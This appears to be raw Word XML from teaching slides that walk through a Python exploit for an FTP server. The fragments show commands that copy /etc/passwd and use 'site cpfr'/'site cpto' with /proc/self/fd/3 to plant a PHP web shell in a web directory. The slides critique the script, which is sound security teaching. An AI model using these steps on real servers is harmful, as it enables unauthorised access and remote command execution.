                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="340751" name="Picture 340751"/>
                          <pic:cNvPicPr/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71775" cy="9810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3814" name="Rectangle 83814"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2781300" y="219075"/>
                            <a:ext cx="582740" cy="34204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23D0C43" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="44"/>
                                </w:rPr>
                                <w:t>line!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F7F765B" id="Group 334201" o:spid="_x0000_s1030" style="position:absolute;left:0;text-align:left;margin-left:-7.2pt;margin-top:114.75pt;width:253.5pt;height:77.25pt;z-index:251678720;mso-position-horizontal-relative:text;mso-position-vertical-relative:text" coordsize="32194,9810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">
                <v:shape id="Picture 340751" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;width:27717;height:98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">
                  <v:imagedata r:id="rId66" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 83814" o:spid="_x0000_s1032" style="position:absolute;left:27813;top:2190;width:5827;height:34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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="123D0C43" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="44"/>
                          </w:rPr>
                          <w:t>line!</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:wrap type="square"/>
              </v:group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79744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="71651B5A" wp14:editId="4ED74F92">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3147060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1676400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1314450" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91278" name="Picture 9127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278" name="Picture 91278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131445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80768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="351461E4" wp14:editId="69FC371A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2356485</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2733675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1295400" cy="47625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91285" name="Picture 9128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285" name="Picture 91285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1295400" cy="476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81792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="0BDAC108" wp14:editId="622C088D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2680335</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3038475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="971550" cy="180975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91201" name="Picture 9120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201" name="Picture 91201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971550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82816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="4E50EF59" wp14:editId="11FB1947">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1880235</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3352800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="838200" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91168" name="Picture 9116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168" name="Picture 91168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8382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83840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="69057A81" wp14:editId="12398C2B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>689610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3838575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3009900" cy="19050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340752" name="Picture 34075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752" name="Picture 340752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3009900" cy="19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84864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="44C31747" wp14:editId="0B60C77A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1184910</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4143375</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1028700" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="91230" name="Picture 9123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230" name="Picture 91230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102870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2"/>
        </w:rPr>
        <w:t>In the example, we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> copied the Python 2 script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E20CA6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="275" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Notice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630BE4B0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="38" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1006" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Defining variables based off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A513078" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="7" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1126" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>command-line arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD4115" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="25" w:after="1"/>
        <w:ind w:left="1096" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>Using PHP syntax to create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276CC80" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="27" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1606" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>a primitive web shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1290065F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="61" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>Understanding this Exploit (2/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A512302" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="295"/>
        <w:ind w:left="7596" w:right="-1230"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD14E24" wp14:editId="6AAF851B">
            <wp:extent cx="6162675" cy="28575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340754" name="Picture 34075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754" name="Picture 340754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6162675" cy="28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pPr w:vertAnchor="text" w:tblpX="7589" w:tblpY="-196"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="9759" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="53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9941"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="33080A18" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="7200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9759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</w:tcPr>
          <w:p w14:paraId="55B8DBEB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>s. connect((server, 21))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FD99832" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="243" w:lineRule="auto"/>
              <w:ind w:left="1613" w:right="1292" w:firstLine="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">s. recv(1024) print </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
              <w:t>+ ] Connected to server [ + ] \n'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B07720" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>s. send( ' site cpfr /etc/passwd' )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D6F2F9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>s. recv(1024)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E3406F5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>s. send( ' site cpto ' + evil)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CFBD04D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>s. recv(1024)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5372F802" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>s. send( ' site cpfr /proc/se1f/fd/3' )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA13CFD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1628"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>s. recv(1024)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50ADB510" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="-113" w:right="-178"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A924854" wp14:editId="08EDB176">
                      <wp:extent cx="6381750" cy="2695575"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:docPr id="333935" name="Group 33393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6381750" cy="2695575"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="6381750" cy="269557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40758" name="Picture 340758"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId7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38100"/>
                                  <a:ext cx="6381750" cy="26574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91716" name="Rectangle 91716"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1104900" y="19050"/>
                                  <a:ext cx="278702" cy="240697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2CD97AFC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="48"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">s.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91717" name="Rectangle 91717"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1314450" y="19050"/>
                                  <a:ext cx="722090" cy="240697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481BC31E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="36"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">send(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91718" name="Rectangle 91718"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1857375" y="19050"/>
                                  <a:ext cx="114014" cy="240697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1B0D3112" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="66"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">'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91719" name="Rectangle 91719"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="1943100" y="19050"/>
                                  <a:ext cx="519398" cy="190024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446E59D0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="46"/>
                                      </w:rPr>
                                      <w:t>site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91742" name="Rectangle 91742"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="3181350" y="0"/>
                                  <a:ext cx="281840" cy="26603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1B0040CD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="40"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">+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91743" name="Rectangle 91743"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="3400425" y="0"/>
                                  <a:ext cx="1380839" cy="278702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1073421F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="42"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">directory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91744" name="Rectangle 91744"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="4438650" y="0"/>
                                  <a:ext cx="281841" cy="26603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45DB5605" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="40"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">+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91745" name="Rectangle 91745"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="4686300" y="0"/>
                                  <a:ext cx="1862233" cy="26603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64506769" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="40"/>
                                      </w:rPr>
                                      <w:t>'infogen.php')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A924854" id="Group 333935" o:spid="_x0000_s1033" style="width:502.5pt;height:212.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="63817,26955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">
                      <v:shape id="Picture 340758" o:spid="_x0000_s1034" type="#_x0000_t75" style="position:absolute;top:381;width:63817;height:265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">
                        <v:imagedata r:id="rId74" o:title=""/>
                      </v:shape>
                      <v:rect id="Rectangle 91716" o:spid="_x0000_s1035" style="position:absolute;left:11049;top:190;width:2787;height:24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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="2CD97AFC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="48"/>
                                </w:rPr>
                                <w:t xml:space="preserve">s. </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91717" o:spid="_x0000_s1036" style="position:absolute;left:13144;top:190;width:7221;height:24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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="481BC31E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">send( </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91718" o:spid="_x0000_s1037" style="position:absolute;left:18573;top:190;width:1140;height:24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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="1B0D3112" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="66"/>
                                </w:rPr>
                                <w:t xml:space="preserve">' </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91719" o:spid="_x0000_s1038" style="position:absolute;left:19431;top:190;width:5193;height:1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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="446E59D0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="46"/>
                                </w:rPr>
                                <w:t>site</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91742" o:spid="_x0000_s1039" style="position:absolute;left:31813;width:2818;height:26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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="1B0040CD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t xml:space="preserve">+ </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91743" o:spid="_x0000_s1040" style="position:absolute;left:34004;width:13808;height:27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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="1073421F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="42"/>
                                </w:rPr>
                                <w:t xml:space="preserve">directory </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91744" o:spid="_x0000_s1041" style="position:absolute;left:44386;width:2818;height:26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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="45DB5605" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t xml:space="preserve">+ </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </v:textbox>
                      </v:rect>
                      <v:rect id="Rectangle 91745" o:spid="_x0000_s1042" style="position:absolute;left:46863;width:18622;height:26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" filled="f" stroked="f">
                        <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="64506769" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                              <w:r>
                                <w:rPr>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t>'infogen.php')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</w:tr>
    </w:tbl>
    <w:p w14:paraId="5678080B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="556" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="21BDA169" wp14:editId="02E5ECB3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1289685</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>879521</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="857250" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="100477" name="Picture 10047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477" name="Picture 100477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857250" cy="1619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86912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="49B6414E" wp14:editId="6FF4229B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1032510</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1603421</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2124075" cy="104775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340759" name="Picture 34075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759" name="Picture 340759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2124075" cy="1047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87936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="03E079EA" wp14:editId="55B1C52C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4747260</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4118022</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="47625" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="100554" name="Picture 10055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554" name="Picture 100554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47625" cy="9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46"/>
        </w:rPr>
        <w:t>The use of site cpfr and site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D97938" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="30" w:after="519" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1306" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>cpto allow copying files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C306A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="13" w:after="1"/>
        <w:ind w:left="1611" w:hanging="1380"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>The script copies a web shell into an accessible directory!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA0888" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="525" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="46" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Unfortunately:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771621D2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="586" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Numerous spelling errors. No exception handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C5C05" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="196" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="586" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>No command results shown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602E07F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1636" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This is bad code!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376B0FD9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Remember: this is another person's code!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214BDC03" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The script might not even work!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7644334E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-84" w:right="-1305"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE6078C" wp14:editId="56BC422D">
            <wp:extent cx="11087100" cy="4295775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340763" name="Picture 34076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763" name="Picture 340763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11087100" cy="4295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713DD5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This is why we need to be able to understand the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605DF004" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-84" w:right="-1305"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F439AA8" wp14:editId="2F90DE7F">
                <wp:extent cx="11087100" cy="4733925"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="334117" name="Group 3341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087100" cy="4733925"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="11087100" cy="4733925"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="340765" name="Picture 340765"/>
                          <pic:cNvPicPr/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>
                          <a:xfrm>
                            <a:off x="0" y="76200"/>
                            <a:ext cx="11087100" cy="465772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09709" name="Rectangle 109709"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="790575" y="0"/>
